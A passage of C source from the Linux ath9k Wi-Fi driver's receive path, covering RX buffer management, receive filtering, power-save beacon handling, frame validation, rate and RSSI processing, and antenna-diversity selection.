		}

		list_for_each_entry(bf, &sc->rx.rxbuf, list) {
			skb = ath_rxbuf_alloc(common, common->rx_bufsize,
					      GFP_KERNEL);
			if (skb == NULL) {
				error = -ENOMEM;
				goto err;
			}

			bf->bf_mpdu = skb;
			bf->bf_buf_addr = dma_map_single(sc->dev, skb->data,
					common->rx_bufsize,
					DMA_FROM_DEVICE);
			if (unlikely(dma_mapping_error(sc->dev,
							bf->bf_buf_addr))) {
				dev_kfree_skb_any(skb);
				bf->bf_mpdu = NULL;
				bf->bf_buf_addr = 0;
				ath_err(common,
					"dma_mapping_error() on RX init\n");
				error = -ENOMEM;
				goto err;
			}
		}
		sc->rx.rxlink = NULL;
	}

err:
	if (error)
		ath_rx_cleanup(sc);

	return error;
}

/* Free all RX buffers and descriptor memory for whichever RX path
 * (EDMA or legacy) is in use. */
void ath_rx_cleanup(struct ath_softc *sc)
{
	struct ath_hw *ah = sc->sc_ah;
	struct ath_common *common = ath9k_hw_common(ah);
	struct sk_buff *skb;
	struct ath_buf *bf;

	if (sc->sc_ah->caps.hw_caps & ATH9K_HW_CAP_EDMA) {
		ath_rx_edma_cleanup(sc);
		return;
	} else {
		list_for_each_entry(bf, &sc->rx.rxbuf, list) {
			skb = bf->bf_mpdu;
			if (skb) {
				dma_unmap_single(sc->dev, bf->bf_buf_addr,
						common->rx_bufsize,
						DMA_FROM_DEVICE);
				dev_kfree_skb(skb);
				bf->bf_buf_addr = 0;
				bf->bf_mpdu = NULL;
			}
		}

		if (sc->rx.rxdma.dd_desc_len != 0)
			ath_descdma_cleanup(sc, &sc->rx.rxdma, &sc->rx.rxbuf);
	}
}

/*
 * Calculate the receive filter according to the
 * operating mode and state:
 *
 * o always accept unicast, broadcast, and multicast traffic
 * o maintain current state of phy error reception (the hal
 *   may enable phy error frames for noise immunity work)
 * o probe request frames are accepted only when operating in
 *   hostap, adhoc, or monitor modes
 * o enable promiscuous mode according to the interface state
 * o accept beacons:
 *   - when operating in adhoc mode so the
 *     802.11 layer creates node table entries for peers,
 *   - when operating in station mode for collecting rssi data when
 *     the station is otherwise quiet, or
 *   - when operating as a repeater so we see repeater-sta beacons
 *   - when scanning
 */

u32 ath_calcrxfilter(struct ath_softc *sc)
{
	u32 rfilt;

	rfilt = ATH9K_RX_FILTER_UCAST | ATH9K_RX_FILTER_BCAST
		| ATH9K_RX_FILTER_MCAST;

	if (sc->rx.rxfilter & FIF_PROBE_REQ)
		rfilt |= ATH9K_RX_FILTER_PROBEREQ;

	/*
	 * Set promiscuous mode when FIF_PROMISC_IN_BSS is enabled for station
	 * mode interface or when in monitor mode. AP mode does not need this
	 * since it receives all in-BSS frames anyway.
	 */
	if (sc->sc_ah->is_monitoring)
		rfilt |= ATH9K_RX_FILTER_PROM;

	if (sc->rx.rxfilter & FIF_CONTROL)
		rfilt |= ATH9K_RX_FILTER_CONTROL;

	/* Single-vif station that is not beacon-promiscuous only needs
	 * beacons from its own BSS. */
	if ((sc->sc_ah->opmode == NL80211_IFTYPE_STATION) &&
	    (sc->nvifs <= 1) &&
	    !(sc->rx.rxfilter & FIF_BCN_PRBRESP_PROMISC))
		rfilt |= ATH9K_RX_FILTER_MYBEACON;
	else
		rfilt |= ATH9K_RX_FILTER_BEACON;

	if ((sc->sc_ah->opmode == NL80211_IFTYPE_AP) ||
	    (sc->rx.rxfilter & FIF_PSPOLL))
		rfilt |= ATH9K_RX_FILTER_PSPOLL;

	if (conf_is_ht(&sc->hw->conf))
		rfilt |= ATH9K_RX_FILTER_COMP_BAR;

	if (sc->nvifs > 1 || (sc->rx.rxfilter & FIF_OTHER_BSS)) {
		/* The following may also be needed for other older chips */
		if (sc->sc_ah->hw_version.macVersion == AR_SREV_VERSION_9160)
			rfilt |= ATH9K_RX_FILTER_PROM;
		rfilt |= ATH9K_RX_FILTER_MCAST_BCAST_ALL;
	}

	return rfilt;

}

/* Link up all RX descriptors (legacy path) or refill the EDMA FIFOs,
 * then start the hardware receive engine. */
int ath_startrecv(struct ath_softc *sc)
{
	struct ath_hw *ah = sc->sc_ah;
	struct ath_buf *bf, *tbf;

	if (ah->caps.hw_caps & ATH9K_HW_CAP_EDMA) {
		ath_edma_start_recv(sc);
		return 0;
	}

	spin_lock_bh(&sc->rx.rxbuflock);
	if (list_empty(&sc->rx.rxbuf))
		goto start_recv;

	sc->rx.rxlink = NULL;
	list_for_each_entry_safe(bf, tbf, &sc->rx.rxbuf, list) {
		ath_rx_buf_link(sc, bf);
	}

	/* We could have deleted elements so the list may be empty now */
	if (list_empty(&sc->rx.rxbuf))
		goto start_recv;

	bf = list_first_entry(&sc->rx.rxbuf, struct ath_buf, list);
	ath9k_hw_putrxbuf(ah, bf->bf_daddr);
	ath9k_hw_rxena(ah);

start_recv:
	ath_opmode_init(sc);
	ath9k_hw_startpcureceive(ah, (sc->sc_flags & SC_OP_OFFCHANNEL));

	spin_unlock_bh(&sc->rx.rxbuflock);

	return 0;
}

/*
 * Abort the PCU receive engine and stop RX DMA.  Returns true when DMA
 * stopped cleanly and no chip reset is required; logs a warning when
 * the DMA engine could not be stopped (unless the device was unplugged).
 */
bool ath_stoprecv(struct ath_softc *sc)
{
	struct ath_hw *ah = sc->sc_ah;
	bool stopped, reset = false;

	spin_lock_bh(&sc->rx.rxbuflock);
	ath9k_hw_abortpcurecv(ah);
	ath9k_hw_setrxfilter(ah, 0);
	stopped = ath9k_hw_stopdmarecv(ah, &reset);

	if (sc->sc_ah->caps.hw_caps & ATH9K_HW_CAP_EDMA)
		ath_edma_stop_recv(sc);
	else
		sc->rx.rxlink = NULL;
	spin_unlock_bh(&sc->rx.rxbuflock);

	if (!(ah->ah_flags & AH_UNPLUGGED) &&
	    unlikely(!stopped)) {
		ath_err(ath9k_hw_common(sc->sc_ah),
			"Could not stop RX, we could be "
			"confusing the DMA engine when we start RX up\n");
		ATH_DBG_WARN_ON_ONCE(!stopped);
	}
	return stopped && !reset;
}

/* Drain pending RX frames with the RXFLUSH flag set so they are
 * discarded rather than delivered.  On EDMA chips both the high and
 * low priority queues are flushed. */
void ath_flushrecv(struct ath_softc *sc)
{
	sc->sc_flags |= SC_OP_RXFLUSH;
	if (sc->sc_ah->caps.hw_caps & ATH9K_HW_CAP_EDMA)
		ath_rx_tasklet(sc, 1, true);
	ath_rx_tasklet(sc, 1, false);
	sc->sc_flags &= ~SC_OP_RXFLUSH;
}

/*
 * Walk a beacon's information elements looking for the TIM element;
 * returns true when the DTIM count is zero and the bitmap control bit
 * signals buffered broadcast/multicast traffic will follow.
 */
static bool ath_beacon_dtim_pending_cab(struct sk_buff *skb)
{
	/* Check whether the Beacon frame has DTIM indicating buffered bc/mc */
	struct ieee80211_mgmt *mgmt;
	u8 *pos, *end, id, elen;
	struct ieee80211_tim_ie *tim;

	mgmt = (struct ieee80211_mgmt *)skb->data;
	pos = mgmt->u.beacon.variable;
	end = skb->data + skb->len;

	while (pos + 2 < end) {
		id = *pos++;
		elen = *pos++;
		if (pos + elen > end)
			break;

		if (id == WLAN_EID_TIM) {
			if (elen < sizeof(*tim))
				break;
			tim = (struct ieee80211_tim_ie *) pos;
			if (tim->dtim_count != 0)
				break;
			return tim->bitmap_ctrl & 0x01;
		}

		pos += elen;
	}

	return false;
}

/* Power-save handling for a received beacon from our own AP: resync
 * beacon timers if requested and decide whether to stay awake for
 * content-after-beacon (CAB) traffic. */
static void ath_rx_ps_beacon(struct ath_softc *sc, struct sk_buff *skb)
{
	struct ath_common *common = ath9k_hw_common(sc->sc_ah);

	/* Too short to be a valid beacon (header + TSF + interval + cap). */
	if (skb->len < 24 + 8 + 2 + 2)
		return;

	sc->ps_flags &= ~PS_WAIT_FOR_BEACON;

	if (sc->ps_flags & PS_BEACON_SYNC) {
		sc->ps_flags &= ~PS_BEACON_SYNC;
		ath_dbg(common, PS,
			"Reconfigure Beacon timers based on timestamp from the AP\n");
		ath_set_beacon(sc);
	}

	if
	    (ath_beacon_dtim_pending_cab(skb)) {
		/*
		 * Remain awake waiting for buffered broadcast/multicast
		 * frames. If the last broadcast/multicast frame is not
		 * received properly, the next beacon frame will work as
		 * a backup trigger for returning into NETWORK SLEEP state,
		 * so we are waiting for it as well.
		 */
		ath_dbg(common, PS,
			"Received DTIM beacon indicating buffered broadcast/multicast frame(s)\n");
		sc->ps_flags |= PS_WAIT_FOR_CAB | PS_WAIT_FOR_BEACON;
		return;
	}

	if (sc->ps_flags & PS_WAIT_FOR_CAB) {
		/*
		 * This can happen if a broadcast frame is dropped or the AP
		 * fails to send a frame indicating that all CAB frames have
		 * been delivered.
		 */
		sc->ps_flags &= ~PS_WAIT_FOR_CAB;
		ath_dbg(common, PS, "PS wait for CAB frames timed out\n");
	}
}

/*
 * Per-frame power-save bookkeeping: process beacons and CAB traffic
 * while dozing, and clear the wait flags once the frames we were
 * staying awake for have arrived.
 */
static void ath_rx_ps(struct ath_softc *sc, struct sk_buff *skb, bool mybeacon)
{
	struct ieee80211_hdr *hdr;
	struct ath_common *common = ath9k_hw_common(sc->sc_ah);

	hdr = (struct ieee80211_hdr *)skb->data;

	/* Process Beacon and CAB receive in PS state */
	if (((sc->ps_flags & PS_WAIT_FOR_BEACON) || ath9k_check_auto_sleep(sc))
	    && mybeacon)
		ath_rx_ps_beacon(sc, skb);
	else if ((sc->ps_flags & PS_WAIT_FOR_CAB) &&
		 (ieee80211_is_data(hdr->frame_control) ||
		  ieee80211_is_action(hdr->frame_control)) &&
		 is_multicast_ether_addr(hdr->addr1) &&
		 !ieee80211_has_moredata(hdr->frame_control)) {
		/*
		 * No more broadcast/multicast frames to be received at this
		 * point.
		 */
		sc->ps_flags &= ~(PS_WAIT_FOR_CAB | PS_WAIT_FOR_BEACON);
		ath_dbg(common, PS, "All PS CAB frames received, back to sleep\n");
	} else if ((sc->ps_flags & PS_WAIT_FOR_PSPOLL_DATA) &&
		   !is_multicast_ether_addr(hdr->addr1) &&
		   !ieee80211_has_morefrags(hdr->frame_control)) {
		sc->ps_flags &= ~PS_WAIT_FOR_PSPOLL_DATA;
		ath_dbg(common, PS,
			"Going back to sleep after having received PS-Poll data (0x%lx)\n",
			sc->ps_flags & (PS_WAIT_FOR_BEACON |
					PS_WAIT_FOR_CAB |
					PS_WAIT_FOR_PSPOLL_DATA |
					PS_WAIT_FOR_TX_ACK));
	}
}

/*
 * Peek at the head of an EDMA RX FIFO and, if the hardware is done with
 * it, unlink the buffer and return it via *dest.  A corrupt descriptor
 * (-EINVAL) causes this buffer and the following one to be recycled
 * back to the hardware.  Returns false when nothing is ready.
 */
static bool ath_edma_get_buffers(struct ath_softc *sc,
				 enum ath9k_rx_qtype qtype,
				 struct ath_rx_status *rs,
				 struct ath_buf **dest)
{
	struct ath_rx_edma *rx_edma = &sc->rx.rx_edma[qtype];
	struct ath_hw *ah = sc->sc_ah;
	struct ath_common *common = ath9k_hw_common(ah);
	struct sk_buff *skb;
	struct ath_buf *bf;
	int ret;

	skb = skb_peek(&rx_edma->rx_fifo);
	if (!skb)
		return false;

	bf = SKB_CB_ATHBUF(skb);
	BUG_ON(!bf);

	dma_sync_single_for_cpu(sc->dev, bf->bf_buf_addr,
				common->rx_bufsize, DMA_FROM_DEVICE);

	ret = ath9k_hw_process_rxdesc_edma(ah, rs, skb->data);
	if (ret == -EINPROGRESS) {
		/*let device gain the buffer again*/
		dma_sync_single_for_device(sc->dev, bf->bf_buf_addr,
				common->rx_bufsize, DMA_FROM_DEVICE);
		return false;
	}

	__skb_unlink(skb, &rx_edma->rx_fifo);
	if (ret == -EINVAL) {
		/* corrupt descriptor, skip this one and the following one */
		list_add_tail(&bf->list, &sc->rx.rxbuf);
		ath_rx_edma_buf_link(sc, qtype);

		skb = skb_peek(&rx_edma->rx_fifo);
		if (skb) {
			bf = SKB_CB_ATHBUF(skb);
			BUG_ON(!bf);

			__skb_unlink(skb, &rx_edma->rx_fifo);
			list_add_tail(&bf->list, &sc->rx.rxbuf);
			ath_rx_edma_buf_link(sc, qtype);
		} else {
			bf = NULL;
		}
	}

	*dest = bf;
	return true;
}

/* Return the next completed EDMA RX buffer for a queue, transparently
 * skipping over corrupt descriptors; NULL when the FIFO is drained. */
static struct ath_buf *ath_edma_get_next_rx_buf(struct ath_softc *sc,
						struct ath_rx_status *rs,
						enum ath9k_rx_qtype qtype)
{
	struct ath_buf *bf = NULL;

	while (ath_edma_get_buffers(sc, qtype, rs, &bf)) {
		if (!bf)
			continue;

		return bf;
	}
	return NULL;
}

static struct ath_buf *ath_get_next_rx_buf(struct ath_softc *sc,
					   struct ath_rx_status *rs)
{
	struct ath_hw *ah = sc->sc_ah;
	struct ath_common *common = ath9k_hw_common(ah);
	struct ath_desc *ds;
	struct ath_buf *bf;
	int ret;

	if (list_empty(&sc->rx.rxbuf)) {
		sc->rx.rxlink = NULL;
		return NULL;
	}

	bf = list_first_entry(&sc->rx.rxbuf, struct ath_buf, list);
	ds = bf->bf_desc;

	/*
	 * Must provide the virtual address of the current
	 * descriptor, the physical address, and the virtual
	 * address of the next descriptor in the h/w chain.
	 * This allows the HAL to look ahead to see if the
	 * hardware is done with a descriptor by checking the
	 * done bit in the following descriptor and the address
	 * of the current descriptor the DMA engine is working
	 * on.  All this is necessary because of our use of
	 * a self-linked list to avoid rx overruns.
	 */
	ret = ath9k_hw_rxprocdesc(ah, ds, rs);
	if (ret == -EINPROGRESS) {
		struct ath_rx_status trs;
		struct ath_buf *tbf;
		struct ath_desc *tds;

		memset(&trs, 0, sizeof(trs));
		if (list_is_last(&bf->list, &sc->rx.rxbuf)) {
			sc->rx.rxlink = NULL;
			return NULL;
		}

		tbf = list_entry(bf->list.next, struct ath_buf, list);

		/*
		 * On some hardware the descriptor status words could
		 * get corrupted, including the done bit. Because of
		 * this, check if the next descriptor's done bit is
		 * set or not.
		 *
		 * If the next descriptor's done bit is set, the current
		 * descriptor has been corrupted. Force s/w to discard
		 * this descriptor and continue...
		 */

		tds = tbf->bf_desc;
		ret = ath9k_hw_rxprocdesc(ah, tds, &trs);
		if (ret == -EINPROGRESS)
			return NULL;
	}

	if (!bf->bf_mpdu)
		return bf;

	/*
	 * Synchronize the DMA transfer with CPU before
	 * 1. accessing the frame
	 * 2. requeueing the same buffer to h/w
	 */
	dma_sync_single_for_cpu(sc->dev, bf->bf_buf_addr,
			common->rx_bufsize,
			DMA_FROM_DEVICE);

	return bf;
}

/* Assumes you've already done the endian to CPU conversion */
static bool ath9k_rx_accept(struct ath_common *common,
			    struct ieee80211_hdr *hdr,
			    struct ieee80211_rx_status *rxs,
			    struct ath_rx_status *rx_stats,
			    bool *decrypt_error)
{
	struct ath_softc *sc = (struct ath_softc *) common->priv;
	bool is_mc, is_valid_tkip, strip_mic, mic_error;
	struct ath_hw *ah = common->ah;
	__le16 fc;
	u8 rx_status_len = ah->caps.rx_status_len;

	fc = hdr->frame_control;

	is_mc = !!is_multicast_ether_addr(hdr->addr1);
	is_valid_tkip = rx_stats->rs_keyix != ATH9K_RXKEYIX_INVALID &&
		test_bit(rx_stats->rs_keyix, common->tkip_keymap);
	/* Only strip the TKIP MIC from error-free data frames keyed with
	 * a known TKIP key. */
	strip_mic = is_valid_tkip && ieee80211_is_data(fc) &&
		!(rx_stats->rs_status &
		(ATH9K_RXERR_DECRYPT | ATH9K_RXERR_CRC | ATH9K_RXERR_MIC |
		 ATH9K_RXERR_KEYMISS));

	/*
	 * Key miss events are only relevant for pairwise keys where the
	 * descriptor does contain a valid key index. This has been observed
	 * mostly with CCMP encryption.
	 */
	if (rx_stats->rs_keyix == ATH9K_RXKEYIX_INVALID)
		rx_stats->rs_status &= ~ATH9K_RXERR_KEYMISS;

	if (!rx_stats->rs_datalen)
		return false;
	/*
	 * rs_status follows rs_datalen so if rs_datalen is too large
	 * we can take a hint that hardware corrupted it, so ignore
	 * those frames.
	 */
	if (rx_stats->rs_datalen > (common->rx_bufsize - rx_status_len))
		return false;

	/* Only use error bits from the last fragment */
	if (rx_stats->rs_more)
		return true;

	mic_error = is_valid_tkip && !ieee80211_is_ctl(fc) &&
		!ieee80211_has_morefrags(fc) &&
		!(le16_to_cpu(hdr->seq_ctrl) & IEEE80211_SCTL_FRAG) &&
		(rx_stats->rs_status & ATH9K_RXERR_MIC);

	/*
	 * The rx_stats->rs_status will not be set until the end of the
	 * chained descriptors so it can be ignored if rs_more is set. The
	 * rs_more will be false at the last element of the chained
	 * descriptors.
	 */
	if (rx_stats->rs_status != 0) {
		u8 status_mask;

		if (rx_stats->rs_status & ATH9K_RXERR_CRC) {
			rxs->flag |= RX_FLAG_FAILED_FCS_CRC;
			mic_error = false;
		}
		if (rx_stats->rs_status & ATH9K_RXERR_PHY)
			return false;

		if ((rx_stats->rs_status & ATH9K_RXERR_DECRYPT) ||
		    (!is_mc && (rx_stats->rs_status & ATH9K_RXERR_KEYMISS))) {
			*decrypt_error = true;
			mic_error = false;
		}

		/*
		 * Reject error frames with the exception of
		 * decryption and MIC failures. For monitor mode,
		 * we also ignore the CRC error.
		 */
		status_mask = ATH9K_RXERR_DECRYPT | ATH9K_RXERR_MIC |
			      ATH9K_RXERR_KEYMISS;

		if (ah->is_monitoring && (sc->rx.rxfilter & FIF_FCSFAIL))
			status_mask |= ATH9K_RXERR_CRC;

		if (rx_stats->rs_status & ~status_mask)
			return false;
	}

	/*
	 * For unicast frames the MIC error bit can have false positives,
	 * so all MIC error reports need to be validated in software.
	 * False negatives are not common, so skip software verification
	 * if the hardware considers the MIC valid.
	 */
	if (strip_mic)
		rxs->flag |= RX_FLAG_MMIC_STRIPPED;
	else if (is_mc && mic_error)
		rxs->flag |= RX_FLAG_MMIC_ERROR;

	return true;
}

/*
 * Translate the hardware rate code into a mac80211 rate index and set
 * the HT/40MHz/short-GI/short-preamble flags.  Returns -EINVAL when
 * the rate code is not found in the current band's bitrate table.
 */
static int ath9k_process_rate(struct ath_common *common,
			      struct ieee80211_hw *hw,
			      struct ath_rx_status *rx_stats,
			      struct ieee80211_rx_status *rxs)
{
	struct ieee80211_supported_band *sband;
	enum ieee80211_band band;
	unsigned int i = 0;

	band = hw->conf.channel->band;
	sband = hw->wiphy->bands[band];

	/* Bit 7 of the rate code marks an HT (MCS) rate. */
	if (rx_stats->rs_rate & 0x80) {
		/* HT rate */
		rxs->flag |= RX_FLAG_HT;
		if (rx_stats->rs_flags & ATH9K_RX_2040)
			rxs->flag |= RX_FLAG_40MHZ;
		if (rx_stats->rs_flags & ATH9K_RX_GI)
			rxs->flag |= RX_FLAG_SHORT_GI;
		rxs->rate_idx = rx_stats->rs_rate & 0x7f;
		return 0;
	}

	for (i = 0; i < sband->n_bitrates; i++) {
		if (sband->bitrates[i].hw_value == rx_stats->rs_rate) {
			rxs->rate_idx = i;
			return 0;
		}
		if (sband->bitrates[i].hw_value_short == rx_stats->rs_rate) {
			rxs->flag |= RX_FLAG_SHORTPRE;
			rxs->rate_idx = i;
			return 0;
		}
	}

	/*
	 * No valid hardware bitrate found -- we should not get here
	 * because hardware has already
	 * validated this frame as OK.
	 */
	ath_dbg(common, ANY,
		"unsupported hw bitrate detected 0x%02x using 1 Mbit\n",
		rx_stats->rs_rate);

	return -EINVAL;
}

/*
 * Feed the RSSI of our own beacons into the low-pass-filtered average
 * that ANI uses.  Only beacons received in STA/IBSS mode count, and
 * ATH9K_RSSI_BAD samples or non-final aggregate subframes are ignored.
 */
static void ath9k_process_rssi(struct ath_common *common,
			       struct ieee80211_hw *hw,
			       struct ieee80211_hdr *hdr,
			       struct ath_rx_status *rx_stats)
{
	struct ath_softc *sc = hw->priv;
	struct ath_hw *ah = common->ah;
	int last_rssi;
	int rssi = rx_stats->rs_rssi;

	if (!rx_stats->is_mybeacon ||
	    ((ah->opmode != NL80211_IFTYPE_STATION) &&
	     (ah->opmode != NL80211_IFTYPE_ADHOC)))
		return;

	if (rx_stats->rs_rssi != ATH9K_RSSI_BAD && !rx_stats->rs_moreaggr)
		ATH_RSSI_LPF(sc->last_rssi, rx_stats->rs_rssi);

	last_rssi = sc->last_rssi;
	if (likely(last_rssi != ATH_RSSI_DUMMY_MARKER))
		rssi = ATH_EP_RND(last_rssi, ATH_RSSI_EP_MULTIPLIER);
	if (rssi < 0)
		rssi = 0;

	/* Update Beacon RSSI, this is used by ANI. */
	ah->stats.avgbrssi = rssi;
}

/*
 * For Decrypt or Demic errors, we only mark packet status here and always push
 * up the frame up to let mac80211 handle the actual error case, be it no
 * decryption key or real decryption error. This let us keep statistics there.
 */
static int ath9k_rx_skb_preprocess(struct ath_common *common,
				   struct ieee80211_hw *hw,
				   struct ieee80211_hdr *hdr,
				   struct ath_rx_status *rx_stats,
				   struct ieee80211_rx_status *rx_status,
				   bool *decrypt_error)
{
	struct ath_hw *ah = common->ah;

	/*
	 * everything but the rate is checked here, the rate check is done
	 * separately to avoid doing two lookups for a rate for each frame.
	 */
	if (!ath9k_rx_accept(common, hdr, rx_status, rx_stats, decrypt_error))
		return -EINVAL;

	/* Only use status info from the last fragment */
	if (rx_stats->rs_more)
		return 0;

	ath9k_process_rssi(common, hw, hdr, rx_stats);

	if (ath9k_process_rate(common, hw, rx_stats, rx_status))
		return -EINVAL;

	/* Fill in the mac80211 RX status from the hardware status. */
	rx_status->band = hw->conf.channel->band;
	rx_status->freq = hw->conf.channel->center_freq;
	rx_status->signal = ah->noise + rx_stats->rs_rssi;
	rx_status->antenna = rx_stats->rs_antenna;
	rx_status->flag |= RX_FLAG_MACTIME_MPDU;
	if (rx_stats->rs_moreaggr)
		rx_status->flag |= RX_FLAG_NO_SIGNAL_VAL;

	return 0;
}

/*
 * Strip the hardware's MAC-header padding from the frame and translate
 * the decryption outcome (key index / protected bit) into mac80211
 * RX flags.
 */
static void ath9k_rx_skb_postprocess(struct ath_common *common,
				     struct sk_buff *skb,
				     struct ath_rx_status *rx_stats,
				     struct ieee80211_rx_status *rxs,
				     bool decrypt_error)
{
	struct ath_hw *ah = common->ah;
	struct ieee80211_hdr *hdr;
	int hdrlen, padpos, padsize;
	u8 keyix;
	__le16 fc;

	/* see if any padding is done by the hw and remove it */
	hdr = (struct ieee80211_hdr *) skb->data;
	hdrlen = ieee80211_get_hdrlen_from_skb(skb);
	fc = hdr->frame_control;
	padpos = ath9k_cmn_padpos(hdr->frame_control);

	/* The MAC header is padded to have 32-bit boundary if the
	 * packet payload is non-zero. The general calculation for
	 * padsize would take into account odd header lengths:
	 * padsize = (4 - padpos % 4) % 4; However, since only
	 * even-length headers are used, padding can only be 0 or 2
	 * bytes and we can optimize this a bit. In addition, we must
	 * not try to remove padding from short control frames that do
	 * not have payload.
	 */
	padsize = padpos & 3;
	if (padsize && skb->len>=padpos+padsize+FCS_LEN) {
		memmove(skb->data + padsize, skb->data, padpos);
		skb_pull(skb, padsize);
	}

	keyix = rx_stats->rs_keyix;

	if (!(keyix == ATH9K_RXKEYIX_INVALID) && !decrypt_error &&
	    ieee80211_has_protected(fc)) {
		rxs->flag |= RX_FLAG_DECRYPTED;
	} else if (ieee80211_has_protected(fc)
		   && !decrypt_error && skb->len >= hdrlen + 4) {
		/* Hardware gave no key index; recover it from the IV's
		 * key-id octet and check our software keymap. */
		keyix = skb->data[hdrlen + 3] >> 6;

		if (test_bit(keyix, common->keymap))
			rxs->flag |= RX_FLAG_DECRYPTED;
	}
	if (ah->sw_mgmt_crypto &&
	    (rxs->flag & RX_FLAG_DECRYPTED) &&
	    ieee80211_is_mgmt(fc))
		/* Use software decrypt for management frames. */
		rxs->flag &= ~RX_FLAG_DECRYPTED;
}

/*
 * Record the RSSI for the current LNA configuration and select the two
 * quick-scan configurations to probe next, based on the current
 * main/alt LNA combination (main nibble << 4 | alt nibble).
 */
static void ath_lnaconf_alt_good_scan(struct ath_ant_comb *antcomb,
				      struct ath_hw_antcomb_conf ant_conf,
				      int main_rssi_avg)
{
	antcomb->quick_scan_cnt = 0;

	if (ant_conf.main_lna_conf == ATH_ANT_DIV_COMB_LNA2)
		antcomb->rssi_lna2 = main_rssi_avg;
	else if (ant_conf.main_lna_conf == ATH_ANT_DIV_COMB_LNA1)
		antcomb->rssi_lna1 = main_rssi_avg;

	switch ((ant_conf.main_lna_conf << 4) | ant_conf.alt_lna_conf) {
	case 0x10: /* LNA2 A-B */
		antcomb->main_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2;
		antcomb->first_quick_scan_conf =
			ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2;
		antcomb->second_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1;
		break;
	case 0x20: /* LNA1 A-B */
		antcomb->main_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2;
		antcomb->first_quick_scan_conf =
			ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2;
		antcomb->second_quick_scan_conf = ATH_ANT_DIV_COMB_LNA2;
		break;
	case 0x21: /* LNA1 LNA2 */
		antcomb->main_conf = ATH_ANT_DIV_COMB_LNA2;
		antcomb->first_quick_scan_conf =
			ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2;
		antcomb->second_quick_scan_conf =
			ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2;
		break;
	case 0x12: /* LNA2 LNA1 */
		antcomb->main_conf = ATH_ANT_DIV_COMB_LNA1;
		antcomb->first_quick_scan_conf =
			ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2;
		antcomb->second_quick_scan_conf =
			ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2;
		break;
	case 0x13: /* LNA2 A+B */
		antcomb->main_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2;
		antcomb->first_quick_scan_conf =
			ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2;
		antcomb->second_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1;
		break;
	case 0x23: /* LNA1 A+B */
		antcomb->main_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2;
		antcomb->first_quick_scan_conf =
			ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2;
		antcomb->second_quick_scan_conf = ATH_ANT_DIV_COMB_LNA2;
		break;
	default:
		break;
	}
}

/*
 * Evaluate the antenna-diversity quick scan and choose the main/alt LNA
 * configuration with the best RSSI/ratio statistics.  quick_scan_cnt
 * selects the phase: 0 and 1 program the next probe configuration and
 * record intermediate results, 2 makes the final decision.
 */
static void ath_select_ant_div_from_quick_scan(struct ath_ant_comb *antcomb,
				      struct ath_hw_antcomb_conf *div_ant_conf,
				      int main_rssi_avg, int alt_rssi_avg,
				      int alt_ratio)
{
	/* alt_good */
	switch (antcomb->quick_scan_cnt) {
	case 0:
		/* set alt to main, and alt to first conf */
		div_ant_conf->main_lna_conf = antcomb->main_conf;
		div_ant_conf->alt_lna_conf = antcomb->first_quick_scan_conf;
		break;
	case 1:
		/* set alt to main, and alt to first conf */
		div_ant_conf->main_lna_conf = antcomb->main_conf;
		div_ant_conf->alt_lna_conf = antcomb->second_quick_scan_conf;
		antcomb->rssi_first = main_rssi_avg;
		antcomb->rssi_second = alt_rssi_avg;

		if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA1) {
			/* main is LNA1 */
			if (ath_is_alt_ant_ratio_better(alt_ratio,
						ATH_ANT_DIV_COMB_LNA1_DELTA_HI,
						ATH_ANT_DIV_COMB_LNA1_DELTA_LOW,
						main_rssi_avg, alt_rssi_avg,
						antcomb->total_pkt_count))
				antcomb->first_ratio = true;
			else
				antcomb->first_ratio = false;
		} else if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA2) {
			if (ath_is_alt_ant_ratio_better(alt_ratio,
						ATH_ANT_DIV_COMB_LNA1_DELTA_MID,
						ATH_ANT_DIV_COMB_LNA1_DELTA_LOW,
						main_rssi_avg, alt_rssi_avg,
						antcomb->total_pkt_count))
				antcomb->first_ratio = true;
			else
				antcomb->first_ratio = false;
		} else {
			if ((((alt_ratio >= ATH_ANT_DIV_COMB_ALT_ANT_RATIO2) &&
			    (alt_rssi_avg > main_rssi_avg +
			    ATH_ANT_DIV_COMB_LNA1_DELTA_HI)) ||
			    (alt_rssi_avg > main_rssi_avg)) &&
			    (antcomb->total_pkt_count > 50))
				antcomb->first_ratio = true;
			else
				antcomb->first_ratio = false;
		}
		break;
	case 2:
		/* Final phase: end the scan and decide. */
		antcomb->alt_good = false;
		antcomb->scan_not_start = false;
		antcomb->scan = false;
		antcomb->rssi_first = main_rssi_avg;
		antcomb->rssi_third = alt_rssi_avg;

		if (antcomb->second_quick_scan_conf == ATH_ANT_DIV_COMB_LNA1)
			antcomb->rssi_lna1 = alt_rssi_avg;
		else if (antcomb->second_quick_scan_conf ==
			 ATH_ANT_DIV_COMB_LNA2)
			antcomb->rssi_lna2 = alt_rssi_avg;
		else if (antcomb->second_quick_scan_conf ==
			 ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2) {
			if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA2)
				antcomb->rssi_lna2 = main_rssi_avg;
			else if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA1)
				antcomb->rssi_lna1 = main_rssi_avg;
		}

		/* Pick the main LNA by comparing per-LNA RSSI averages. */
		if (antcomb->rssi_lna2 > antcomb->rssi_lna1 +
		    ATH_ANT_DIV_COMB_LNA1_LNA2_SWITCH_DELTA)
			div_ant_conf->main_lna_conf = ATH_ANT_DIV_COMB_LNA2;
		else
			div_ant_conf->main_lna_conf = ATH_ANT_DIV_COMB_LNA1;

		if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA1) {
			if (ath_is_alt_ant_ratio_better(alt_ratio,
						ATH_ANT_DIV_COMB_LNA1_DELTA_HI,
						ATH_ANT_DIV_COMB_LNA1_DELTA_LOW,
						main_rssi_avg, alt_rssi_avg,
						antcomb->total_pkt_count))
